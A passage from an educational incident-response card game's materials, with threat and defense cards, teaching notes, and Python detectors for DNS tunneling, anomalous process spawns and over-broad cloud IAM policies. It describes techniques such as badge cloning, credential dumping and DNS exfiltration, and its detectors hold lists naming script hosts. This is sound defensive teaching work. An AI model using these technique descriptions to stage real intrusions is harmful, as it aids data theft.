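2024-03-01T10:00:05 10.0.8.15 api.example.com
2024-03-01T10:00:30 10.0.8.15 www.example.com
2024-03-01T10:00:00 10.0.8.42 q9lpz3ka7ubx.tunnel-example.net
2024-03-01T10:00:10 10.0.8.42 0xm2wv8yqpzt.tunnel-example.net
2024-03-01T10:00:20 10.0.8.42 h4ns7e1dgk9o.tunnel-example.net
2024-03-01T10:00:30 10.0.8.42 rb62zt5cqw0j.tunnel-example.net
2024-03-01T10:00:40 10.0.8.42 f8ya3lmx1puv.tunnel-example.net
2024-03-01T10:00:50 10.0.8.42 3kd9sh2qnzwe.tunnel-example.net
2024-03-01T10:01:00 10.0.8.42 u7gb5xo1rc4m.tunnel-example.net
2024-03-01T10:01:10 10.0.8.42 p2wjt6ka0vhd.tunnel-example.net
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


def shannon_entropy(text):
    """Bits per character; encoded payloads score far higher than words."""
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname):
    # Simplification for the example: last two labels = registrable domain
    return ".".join(qname.rstrip(".").split(".")[-2:])


def analyze(log_text):
    """Per base domain: query count, distinct leftmost labels, mean label
    entropy and length, and spread of inter-query gaps (0 = metronomic)."""
    per_domain = defaultdict(lambda: {"labels": [], "times": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, _client, qname = m.groups()
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue  # bare registrable domain, nothing to inspect
        entry = per_domain[base_domain(qname)]
        entry["labels"].append(labels[0])
        entry["times"].append(datetime.fromisoformat(ts))
    stats = {}
    for dom, entry in per_domain.items():
        times = sorted(entry["times"])
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        stats[dom] = {
            "queries": len(entry["labels"]),
            "distinct_labels": len(set(entry["labels"])),
            "mean_entropy": mean(shannon_entropy(l) for l in entry["labels"]),
            "mean_label_len": mean(len(l) for l in entry["labels"]),
            "gap_stdev": pstdev(gaps) if len(gaps) > 1 else None,
        }
    return stats


def flag_tunnels(stats, min_distinct=5, min_entropy=3.0, min_len=8):
    """Domains whose subdomains are many, long and high-entropy at once."""
    return sorted(dom for dom, s in stats.items()
                  if s["distinct_labels"] >= min_distinct
                  and s["mean_entropy"] >= min_entropy
                  and s["mean_label_len"] >= min_len)


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for dom in flag_tunnels(report):
        print(dom, report[dom])
```

Thresholds here are illustrative; in practice they are set from a baseline of the organisation's own resolver traffic, as the card's "baseline analysis" note implies.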

Physical Security Bypass

Card T-20: Physical Access + Badge Cloning Attack

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PHYSICAL ACCESS + BADGE CLONING     │
│ ATTACK                              │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your security team discovers that  │
│ an RFID badge belonging to a        │
│ manager was cloned using a portable │
│ reader. The cloned badge was used   │
│ to gain access to your secure data  │
│ center after-hours. Badge access    │
│ logs are timestamped, but the       │
│ person's schedule shows they weren't│
│ in the office that evening. Your    │
│ server room CCTV captured footage   │
│ of an unknown individual installing │
│ a wireless device in the network    │
│ rack."                              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Physical security is often          │
│ overlooked in cybersecurity         │
│ programs. RFID badges can be cloned │
│ with inexpensive readers. Once      │
│ inside the data center, attackers   │
│ can install rogue network devices,  │
│ steal hardware, or gain console     │
│ access to servers. Defense requires:│
│ - Encrypted badge technology        │
│ - Multi-factor access (biometric)   │
│ - CCTV monitoring                   │
│ - Environmental controls            │
│ - Equipment inventory tracking      │
│ - Badge deactivation on exit        │
│                                     │
│ DETECTION DIFFICULTY: High          │
│ Requires integration of physical    │
│ and cyber security monitoring.      │
└─────────────────────────────────────┘

Integrating Expansion Threats into Your Game

Attack Vector Summary (Expansion Cards)

Suggested Scenario Combinations

Scenario 4: "Supply Chain Nightmare" (5-card chain - Expert)

Teaches: Third-party risk management, vendor security assessment, incident response at scale

1. Compromised Software Vendor Update (Initial Compromise) → MALWARE
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Scheduled Task Persistence (Persistence) → MALWARE
4. Beaconing to C2 Server (C2 & Exfil) → NETWORK
5. SQL Database Exfiltration (C2 & Exfil) → DATA EXFIL

Special Rule: Reveal this threat to 3+ teams (representing industry-wide detection). First team to detect gains +20 Budget (represents vendor advisory advantage).

Scenario 5: "Insider Threat Explosion" (4-card chain - Intermediate)

Teaches: Insider risk detection, privileged access management, offboarding procedures

1. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Mimikatz Credential Dumping (Pivot & Escalate) → CREDENTIAL ABUSE
4. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL

Special Rule: The employee's offboarding checklist is partially incomplete. Teams get a -2 penalty to detect the first insider threat (represents delayed detection in real situations).

Scenario 6: "Modern Infrastructure Attack" (5-card chain - Expert)

Teaches: IoT security, cloud security, API management, defense breadth

1. Compromised IoT Device as Pivot Point (Initial Compromise) → NETWORK
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE
4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL

Parallel threat: Teams must defend against both cloud and on-premises infrastructure simultaneously.

Scenario 7: "Physical Meets Cyber" (4-card chain - Intermediate)

Teaches: Physical security integration, environmental controls, holistic security

1. Physical Access + Badge Cloning (Initial Compromise) → CREDENTIAL ABUSE
2. Lateral Movement via SMB (Pivot & Escalate) → NETWORK
3. Scheduled Task Persistence (Persistence) → MALWARE
4. Ransomware Payload Deployment (C2 & Exfil) → MALWARE

Special Rule: The first defense deployed must address the physical security aspect (badge systems, CCTV review, environmental controls). Teams get a narrative bonus: "Your physical security team noticed the intruder before full compromise."

Scenario 8: "Supply Chain + Insider Collusion" (5-card chain - Hard)

Teaches: Complex attack coordination, detecting collusion, multi-vector threats

1. Malicious Third-Party Library Injection (Initial Compromise) → MALWARE
2. Disgruntled Employee Sabotage (Pivot & Escalate) → MALWARE
3. Cloud API Token Theft & Abuse (Pivot & Escalate) → CREDENTIAL ABUSE
4. DNS Tunneling Data Exfiltration (C2 & Exfil) → DATA EXFIL
5. Malicious Insider Data Theft (C2 & Exfil) → DATA EXFIL

Special Rule: Two threats must be revealed to understand the full scope (supply chain + insider collaboration). Incomplete investigation leads to missed detection of the insider component.


Recommended Defense Cards for Expansion Threats

(v2.2) Entries now cite real card IDs from the core deck (D-01 to D-24) and expansion deck (D-25 to D-43, see advanced-defenses.md). Concepts without a printed card are marked (custom — not in deck) and make good custom-card projects.

For Supply Chain Attacks (T-13, T-14)

For Insider Threats (T-15, T-16)

For IoT Device Compromise (T-17)

For Cloud API Abuse (T-18)

For DNS Tunneling (T-19)

For Physical Security Bypass (T-20)


Difficulty Adjustments Using Expansion Cards

Easy + Expansion (6-card chain)

Medium + Expansion (4-5 card chains with expansion)

Hard + Expansion (5+ card chains with 2+ expansion cards)


Teaching Notes for Threat Orchestrators

Supply Chain Attacks (T-13, T-14)

Real-world context:
- SolarWinds (2020) - 18,000+ organizations affected
- 3CX (2023) - Trojanized build system
- XcodeGhost (2015) - Compromised Xcode developer tool
- Typosquatted packages discovered monthly on npm/PyPI

Discussion points after reveal:
- "How do you verify software authenticity?"
- "What's the difference between detecting supply chain compromises vs. traditional malware?"
- "Why is this harder to detect than direct attacks?"

Insider Threats (T-15, T-16)

Real-world context:
- ~30-40% of data breaches involve insiders (Verizon DBIR)
- Manning, Snowden, Reality Winner cases (government sector)
- Thousands of employee theft cases in financial/tech industries

Discussion points after reveal:
- "How would you detect insider threat indicators before damage occurs?"
- "Why is offboarding security often weak?"
- "What's the difference between a malicious insider and a negligent employee?"

IoT Device Compromise (T-17)

Real-world context:
- Mirai botnet (2016) - Millions of compromised IoT devices
- Connected cameras, printers, thermostats often neglected
- "Shadow IT" problem in many organizations

Discussion points after reveal:
- "Should IoT devices be on the same network as critical systems?"
- "How do you patch thousands of IoT devices?"
- "Why are credentials often factory-default on IoT?"

Cloud API Abuse (T-18)

Real-world context:
- AWS credentials leaked in GitHub ~8 times per day (GitHub telemetry)
- Tesla's Kubernetes cluster hacked via exposed credentials
- Capital One breach involved compromised IAM role

Discussion points after reveal:
- "How do you manage API keys for thousands of developers?"
- "Why is secrets rotation hard in practice?"
- "How would you know if someone used your AWS API key?"

DNS Tunneling (T-19)

Real-world context:
- Used by DNS.Exfiltrator, OilRig APT, Turla malware families
- Hard to detect because DNS is typically trusted
- Can exfil ~20 KB/hour via subdomains

Discussion points after reveal:
- "Why is DNS hard to monitor?"
- "What would a normal DNS query pattern look like?"
- "How would you distinguish data exfil from normal DNS activity?"
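
The query content analysis and pattern detection the T-19 card calls for, as an added Python example that is not part of the game's materials; it answers the last discussion point above on constructed log lines, and the domain names, client addresses and scoring thresholds are assumptions chosen for illustration.

```python
import base64
import math
import random
import statistics
from collections import defaultdict

# base64url alphabet: tunnels use it (or base32) because "+" and "/" are
# not valid characters in DNS labels.
BASE64URL_CHARS = set(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_")


def make_sample_log():
    """Constructed DNS query log as (epoch seconds, client IP, name).

    Benign: five hostnames queried at irregular intervals.
    Tunnel-like: a fresh base64url label under one domain every 30 s,
    mirroring the "steady intervals" in the T-19 clue. All names and
    addresses are placeholders, not real infrastructure.
    """
    rng = random.Random(7)  # fixed seed so the output is reproducible
    benign = ["www.example.com", "mail.example.com", "cdn.example.com",
              "login.example.com", "api.example.com"]
    log, t = [], 1_700_000_000
    for _ in range(40):
        t += rng.randint(1, 120)
        log.append((t, "10.0.0.5", rng.choice(benign)))
    t = 1_700_000_000
    for _ in range(20):
        t += 30
        chunk = bytes(rng.getrandbits(8) for _ in range(18))  # 18 B -> 24 chars
        label = base64.urlsafe_b64encode(chunk).decode().rstrip("=")
        log.append((t, "10.0.0.42", f"{label}.upd-cdn.example.net"))
    return sorted(log)


def registered_domain(qname):
    """Approximate the registrable domain as the last two labels
    (production code should consult the public suffix list)."""
    parts = qname.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def shannon_entropy(text):
    """Bits per character; encoded or random data scores high."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyse(log, min_queries=10):
    """Per-domain tunneling indicators and a verdict, keyed by domain.
    Domains with fewer than min_queries lookups are skipped."""
    by_domain = defaultdict(list)
    for ts, _client, qname in log:
        by_domain[registered_domain(qname)].append((ts, qname))

    report = {}
    for domain, entries in by_domain.items():
        if len(entries) < min_queries:
            continue
        entries.sort()
        # In a tunnel the leftmost label carries the payload chunk.
        labels = [q.split(".")[0] for _, q in entries]
        unique_ratio = len(set(labels)) / len(labels)
        mean_entropy = statistics.mean(shannon_entropy(l) for l in labels)
        b64_ratio = sum(1 for l in labels
                        if len(l) >= 16 and set(l) <= BASE64URL_CHARS) / len(labels)
        gaps = [b[0] - a[0] for a, b in zip(entries, entries[1:])]
        mean_gap = statistics.mean(gaps)
        # Coefficient of variation of the inter-query gap: near zero means a
        # clock-driven client rather than human browsing or cache expiry.
        gap_cv = statistics.pstdev(gaps) / mean_gap if mean_gap > 0 else 0.0
        indicators = {
            "mostly_unique_labels": unique_ratio >= 0.9,
            "high_label_entropy": mean_entropy >= 3.5,
            "base64url_like_labels": b64_ratio >= 0.8,
            "steady_interval": gap_cv <= 0.25,
        }
        report[domain] = {
            "queries": len(entries),
            "mean_entropy": round(mean_entropy, 2),
            "gap_cv": round(gap_cv, 2),
            "indicators": indicators,
            # Three of four indicators: one busy CDN alone should not trip it.
            "suspicious": sum(indicators.values()) >= 3,
        }
    return report


if __name__ == "__main__":
    for domain, r in analyse(make_sample_log()).items():
        verdict = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{domain:14} n={r['queries']:3} entropy={r['mean_entropy']:.2f} "
              f"gap_cv={r['gap_cv']:.2f} {verdict}")
```

On real resolver logs the same four indicators need a per-organization baseline (the "baseline analysis" the card mentions), since CDNs and telemetry services also produce many unique, high-entropy labels.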

Physical Security Bypass (T-20)

Real-world context:
- RFID cloning demonstrated on hotel keys, building badges
- Rogue network devices found in data centers (Target breach had physical component)
- USB drops with malware remain effective attack vectors

Discussion points after reveal:
- "Should cybersecurity teams care about physical security?"
- "How do you audit data center access?"
- "What's harder to defend: cyber or physical attacks?"


Expansion Threat Card Deck Summary

Card  Title                                    Step              Vector            Difficulty
T-13  Compromised Software Vendor Update       INITIAL           MALWARE           Hard
T-14  Malicious Third-Party Library Injection  INITIAL           MALWARE           Medium
T-15  Malicious Insider Data Theft             C2 & EXFIL        DATA EXFIL        Very Hard
T-16  Disgruntled Employee Sabotage            PIVOT & ESCALATE  MALWARE           Hard
T-17  Compromised IoT Device as Pivot Point    INITIAL           NETWORK           Medium
T-18  Cloud API Token Theft & Abuse            PIVOT & ESCALATE  CREDENTIAL ABUSE  Hard
T-19  DNS Tunneling Data Exfiltration          C2 & EXFIL        DATA EXFIL        Very Hard
T-20  Physical Access + Badge Cloning          INITIAL           CREDENTIAL ABUSE  Hard

Quick Integration Checklist


Expansion Threat Card Set for Incident Zero
Use these cards to add modern threat scenarios to your game
For discussion and teaching notes, see above sections

cards/incident-response/expansion-deck/advanced-defenses.md

Incident Zero: Expansion Defense Cards

Advanced Security Controls & Defensive Capabilities

This document provides additional Defense Cards for expanding Incident Zero gameplay beyond the base 24-card deck. These cards introduce modern security architectures and advanced defensive capabilities that complement the base game.

Note (v2.2): These expansion defenses were renumbered from D-19–D-37 to D-25–D-43 to avoid colliding with core deck cards D-19–D-24 (see ../core-deck/threat-defense-cards.md).


ADDITIONAL DEFENSE CARDS (19 Cards)

Application Whitelisting Defenses

Card D-25: Application Whitelisting (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ APPLICATION WHITELISTING            │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy application whitelisting on  │
│ critical workstations and servers.  │
│ Maintain an approved applications   │
│ list (Word, Excel, Chrome, etc.).   │
│ Block execution of any unapproved   │
│ binaries. Use AppLocker (Windows)   │
│ or similar tools.                   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents execution of malware and   │
│ unauthorized tools. Attackers cannot│
│ run ransomware, backdoors, or       │
│ penetration tools if they're not on │
│ the whitelist. Effective against    │
│ zero-days if not signed by trusted  │
│ publishers.                         │
│                                     │
│ LIMITATION: False positives if      │
│ maintenance is poor. Users may      │
│ struggle with legitimate tools      │
│ being blocked.                      │
└─────────────────────────────────────┘

Card D-26: Advanced Application Control with AI

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ ADVANCED APPLICATION CONTROL WITH AI│
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy AI-powered application       │
│ control that learns normal program  │
│ execution patterns. System builds a │
│ baseline of legitimate applications │
│ and automatically flags deviations. │
│ Prevents execution of suspicious    │
│ or anomalous applications.          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Combines whitelisting with behavior │
│ analysis. Adapts to legitimate new  │
│ applications without manual updates.│
│ Catches polymorphic malware variants│
│ that might bypass static            │
│ whitelisting (different packing,    │
│ slight name changes). Reduces false │
│ positives.                          │
│                                     │
│ LEARNING CURVE: Requires baseline   │
│ training period (1-2 weeks).        │
└─────────────────────────────────────┘

Card D-27: Living-Off-The-Land Blocker (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ LIVING-OFF-THE-LAND BLOCKER         │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy advanced script and tool     │
│ control that restricts execution of │
│ PowerShell, WScript, cmd.exe, and   │
│ other "living-off-the-land" tools.  │
│ Allow only specific, monitored usage│
│ with strong justification logging.  │
│ Monitor for obfuscation patterns.   │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Directly targets attacker techniques│
│ used in privilege escalation and    │
│ lateral movement (scheduled tasks,  │
│ registry modification, credential   │
│ dumping). Makes PowerShell and cmd  │
│ attacks extremely difficult.        │
│ Works especially well with EDR.     │
│                                     │
│ IMPACT: May break legitimate admin  │
│ tasks; requires strong change       │
│ management.                         │
└─────────────────────────────────────┘

Behavioral Analytics Defenses

Card D-28: Baseline Behavior Learning System (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BASELINE BEHAVIOR LEARNING SYSTEM   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy behavioral analytics that    │
│ establishes baseline profiles for   │
│ users, systems, and network traffic.│
│ System learns what "normal" looks   │
│ like, then alerts on deviations.    │
│ Monitors: login times, file access, │
│ network destinations, and resource  │
│ usage.                              │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects anomalies like:             │
│ - Unusual login geography/time      │
│ - Data access patterns changing     │
│ - Lateral movement via SMB          │
│ - New network destinations          │
│ Works best as a *combination* with  │
│ other tools. Requires good baseline │
│ data (1-2 weeks of normal traffic). │
│                                     │
│ DETECTS: Insider threats,           │
│ compromised credentials, and APT    │
│ tactics.                            │
└─────────────────────────────────────┘

Card D-29: Process Behavior Analysis (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PROCESS BEHAVIOR ANALYSIS           │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy process-level behavioral     │
│ monitoring that learns what each    │
│ application normally does (file I/O,│
│ network calls, registry access,     │
│ child processes spawned). Blocks    │
│ anomalous behavior from legitimate  │
│ binaries.                           │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches:                            │
│ - Legitimate apps compromised by    │
│  supply chain attack                │
│ - Process injection attacks         │
│ - Unexpected child process creation │
│ - Anomalous registry/file writes    │
│ Example: Word.exe normally doesn't  │
│ spawn PowerShell; if it does, block │
│ and alert.                          │
│                                     │
│ DETECTS: Zero-day malware, APT      │
│ techniques, and supply chain        │
│ compromises.                        │
└─────────────────────────────────────┘
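
The learn-then-enforce model the D-29 card describes, including its Word-spawns-PowerShell example, as an added Python example that is not code from the game or from any product; the process events, host names, office-app and script-host lists, and the allow/block/alert thresholds are constructed assumptions for illustration.

```python
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (constructed; field names are our own)."""
    host: str
    parent: str  # image name of the parent process, lower-case
    child: str   # image name of the spawned child, lower-case


# Hard rule, kept outside the learned baseline: a document viewer has no
# business starting a script host, and a baseline learned while a compromise
# was already under way would otherwise "bless" exactly that pattern.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}


class ProcessBehaviorBaseline:
    """Learn which children each parent normally spawns, then classify."""

    def __init__(self, min_observations=3):
        self.min_observations = min_observations
        self.pair_counts = Counter()    # (parent, child) -> times seen
        self.parent_counts = Counter()  # parent -> times seen as a parent

    def learn(self, events):
        """Learning period: record every parent/child pair observed."""
        for ev in events:
            self.pair_counts[(ev.parent, ev.child)] += 1
            self.parent_counts[ev.parent] += 1

    def classify(self, ev):
        """Return "allow", "block" or "alert" for a new event."""
        if ev.parent in OFFICE_APPS and ev.child in SCRIPT_HOSTS:
            return "block"  # hard rule, independent of the learned baseline
        if self.pair_counts[(ev.parent, ev.child)] >= self.min_observations:
            return "allow"  # this parent routinely spawns this child
        if self.parent_counts[ev.parent] >= self.min_observations:
            return "block"  # well-known parent doing something it never did
        return "alert"      # parent itself is unknown: too little baseline to block


def build_training_events():
    """Constructed learning-period events from two workstations."""
    events = []
    for host in ("ws-01", "ws-02"):
        events += [ProcEvent(host, "explorer.exe", "winword.exe")] * 5
        events += [ProcEvent(host, "winword.exe", "splwow64.exe")] * 3
        events += [ProcEvent(host, "explorer.exe", "chrome.exe")] * 6
        events += [ProcEvent(host, "services.exe", "svchost.exe")] * 8
    return events


def run_demo():
    """Train on the constructed baseline, then classify four new events."""
    baseline = ProcessBehaviorBaseline(min_observations=3)
    baseline.learn(build_training_events())
    test_events = [
        ProcEvent("ws-01", "winword.exe", "splwow64.exe"),    # normal print helper
        ProcEvent("ws-01", "winword.exe", "powershell.exe"),  # the card's example
        ProcEvent("ws-02", "winword.exe", "certutil.exe"),    # unseen child, known parent
        ProcEvent("ws-02", "updater.exe", "cmd.exe"),         # parent never baselined
    ]
    return {(ev.parent, ev.child): baseline.classify(ev) for ev in test_events}


if __name__ == "__main__":
    for (parent, child), verdict in run_demo().items():
        print(f"{parent:14} -> {child:15} {verdict}")
```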

Card D-30: Machine Learning Anomaly Detection (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MACHINE LEARNING ANOMALY DETECTION  │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy ML models trained on         │
│ terabytes of security data. System  │
│ detects subtle anomalies humans     │
│ would miss: small timing changes,   │
│ rare resource combinations, and     │
│ statistical outliers. Continuously  │
│ retrains on new data.               │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches advanced attacks that bypass│
│ signature and rule-based systems.   │
│ Detects:                            │
│ - Polymorphic malware variations    │
│ - Advanced persistent threats (APT) │
│ - Zero-day exploits (by behavior)   │
│ - Sophisticated insider threats     │
│ - Supply chain compromises          │
│                                     │
│ TRADE-OFF: False positives require  │
│ human analysis. Requires large      │
│ datasets for training.              │
└─────────────────────────────────────┘

Container Security Defenses

Card D-31: Container Image Scanning (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER IMAGE SCANNING            │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Scan all container images before    │
│ deployment for known vulnerabilities│
│ and malicious packages. Integrate   │
│ scanning into CI/CD pipeline.       │
│ Block images with critical CVEs     │
│ from being deployed.                │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents deployment of vulnerable   │
│ containers. Catches:                │
│ - Old base images with known CVEs   │
│ - Malicious packages in dependencies│
│ - Secrets accidentally baked into   │
│ images                              │
│ Works best when combined with       │
│ runtime monitoring.                 │
│                                     │
│ LIMITATION: Only catches known      │
│ vulnerabilities (CVE databases).    │
└─────────────────────────────────────┘

Card D-32: Container Runtime Protection (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CONTAINER RUNTIME PROTECTION        │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy runtime security monitoring  │
│ that enforces security policies on  │
│ running containers. Monitor syscalls│
│ (system calls), network connections,│
│ and file access. Enforce AppArmor   │
│ or SELinux profiles.                │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects and blocks:                 │
│ - Container escape attempts         │
│ - Lateral movement between          │
│  containers                         │
│ - Privilege escalation in container │
│ - Anomalous process execution       │
│ - Unexpected network connections    │
│ Works against both known and unknown│
│ attacks (zero-day exploits).        │
│                                     │
│ REQUIREMENT: Requires kernel-level  │
│ instrumentation; varies by platform.│
└─────────────────────────────────────┘

Card D-33: Kubernetes Network Policy & RBAC (ELITE)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ KUBERNETES NETWORK POLICY & RBAC    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement Kubernetes network        │
│ policies to restrict container-to-  │
│ container communication. Deploy     │
│ role-based access control (RBAC)    │
│ for API access and service accounts.│
│ Enforce pod security policies and   │
│ admission controllers.              │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Implements micro-segmentation in    │
│ containerized environments.         │
│ Prevents:                           │
│ - Lateral movement between pods     │
│ - Container escape attacks          │
│  accessing host network             │
│ - Privilege escalation via RBAC     │
│ - Unauthorized Kubernetes API access│
│                                     │
│ COMPLEXITY: Requires mature         │
│ Kubernetes operations and expertise.│
└─────────────────────────────────────┘

Cloud Security Posture Management (CSPM)

Card D-34: Cloud Configuration Auditing (Basic)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD CONFIGURATION AUDITING        │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy continuous cloud             │
│ configuration monitoring (AWS       │
│ Config, Azure Policy Manager, GCP   │
│ Cloud Asset Inventory). Scan for    │
│ misconfigured resources:            │
│ - Public S3 buckets                 │
│ - Overly permissive IAM policies    │
│ - Unencrypted databases             │
│ - Open security groups              │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects misconfigurations that allow│
│ unauthorized access:                │
│ - Public database access            │
│ - Exposed credentials in configs    │
│ - Overly broad IAM permissions      │
│ - Disabled encryption/logging       │
│ Alert on drift from secure baseline.│
│                                     │
│ LIMITATION: Only catches known      │
│ misconfiguration patterns.          │
└─────────────────────────────────────┘
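
Two of the checks the D-34 card lists, overly permissive IAM policies and public S3 buckets, as an added Python example rather than any vendor tool's code; the three policy documents and the bucket name are constructed placeholders, and the finding rules are this example's own assumptions about what an auditor would flag.

```python
import json

# Constructed policy documents (not from any real account). The first is the
# "overly permissive IAM policy" an audit should flag; the second is a
# least-privilege rewrite of the same intent (read one bucket's objects).
PERMISSIVE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "TooBroad", "Effect": "Allow", "Action": "*", "Resource": "*"},
    {"Sid": "StarS3", "Effect": "Allow", "Action": ["s3:*"],
     "Resource": "arn:aws:s3:::reports-bucket-placeholder/*"}
  ]
}""")

SCOPED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "ReadReports", "Effect": "Allow",
     "Action": ["s3:GetObject", "s3:ListBucket"],
     "Resource": ["arn:aws:s3:::reports-bucket-placeholder",
                  "arn:aws:s3:::reports-bucket-placeholder/*"]}
  ]
}""")

# A bucket policy that makes every object world-readable ("public S3 bucket").
PUBLIC_BUCKET_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject",
     "Resource": "arn:aws:s3:::reports-bucket-placeholder/*"}
  ]
}""")


def _as_list(value):
    """IAM accepts a string or a list in Action/Resource/Principal fields."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_public_principal(principal):
    """True for Principal "*" or {"AWS": "*"}: anyone on the internet."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return any(p == "*" for p in _as_list(principal.get("AWS")))
    return False


def audit_policy(policy):
    """Return (Sid, finding) pairs for Allow statements that widen access.

    Only Allow statements are examined: Deny statements only narrow access.
    A wildcard Resource is reported even where it is unavoidable (some
    list/describe actions only work on "*"), so review findings by hand.
    """
    findings = []
    for i, stmt in enumerate(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        sid = stmt.get("Sid", f"statement[{i}]")
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))
        if "NotAction" in stmt:
            findings.append((sid, "Allow with NotAction grants everything not listed"))
        if "*" in actions and "*" in resources:
            findings.append((sid, "administrator-equivalent (Action * on Resource *)"))
        else:
            if any(a == "*" or a.endswith(":*") for a in actions):
                findings.append((sid, "wildcard action"))
            if "*" in resources:
                findings.append((sid, "wildcard resource"))
        if _is_public_principal(stmt.get("Principal")) and not stmt.get("Condition"):
            findings.append((sid, "public principal without Condition"))
    return findings


if __name__ == "__main__":
    for name, doc in [("permissive", PERMISSIVE_POLICY),
                      ("scoped", SCOPED_POLICY),
                      ("public bucket", PUBLIC_BUCKET_POLICY)]:
        print(name, audit_policy(doc) or "no findings")
```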

Card D-35: Cloud Access & Permission Auditing (Advanced)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CLOUD ACCESS & PERMISSION AUDITING  │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Audit all IAM roles, service        │
│ accounts, and API credentials for   │
│ over-privilege. Implement least-    │
